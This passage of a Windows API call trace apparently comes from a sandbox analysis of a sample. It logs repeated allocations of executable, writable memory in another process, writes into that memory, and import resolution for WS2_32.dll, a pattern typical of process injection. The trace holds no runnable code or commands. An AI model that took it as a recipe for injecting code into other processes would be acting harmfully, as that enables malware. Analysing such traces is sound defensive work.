BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x28, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.945] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949eba*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949eba*, NumberOfBytesWritten=0x28df88*=0x10) returned 0x0 [0140.945] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.945] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.946] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.946] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.946] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.946] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.946] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.946] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.946] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.946] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.947] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20020, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.947] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.947] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a250, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.947] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x949ef4, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="WS2_32.dll") returned 11 [0140.947] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.947] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x15) returned 0x0 [0140.947] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.947] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.948] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.948] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.948] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.948] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.948] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.951] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.951] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.952] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.952] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.952] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.952] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0140.952] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.952] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.952] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.953] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.953] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.953] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.008] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.008] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.008] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.009] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.009] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.009] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a260, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.009] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0141.009] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ed8*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ed8*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0141.009] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0141.009] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.010] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.010] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.010] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.010] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.010] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.010] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.010] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.010] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.010] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.011] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.011] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a268, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.011] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0141.011] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ee6*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ee6*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0141.011] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0141.011] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.011] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.011] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.012] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.012] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.012] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.012] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.012] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.012] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.012] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.013] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.013] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a270, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.013] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.013] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.013] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.013] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.013] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.014] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.014] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.014] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.014] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.014] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.014] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.014] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.014] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a278, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.015] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.015] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.015] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.015] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.015] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.015] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.015] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.016] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.016] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.016] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.016] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.016] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.016] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a280, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.016] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.016] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.017] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.017] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.017] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.017] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.017] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.017] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.017] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0141.017] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0141.018] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0141.018] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0141.018] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a288, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0141.018] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e010*=0x0, ZeroBits=0x0, RegionSize=0x28df90*=0x8, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e010*=0x20000, RegionSize=0x28df90*=0x1000) returned 0x0 [0141.018] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0141.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0141.018] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0141.018] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0141.018] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0141.019] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.019] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.019] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0141.019] 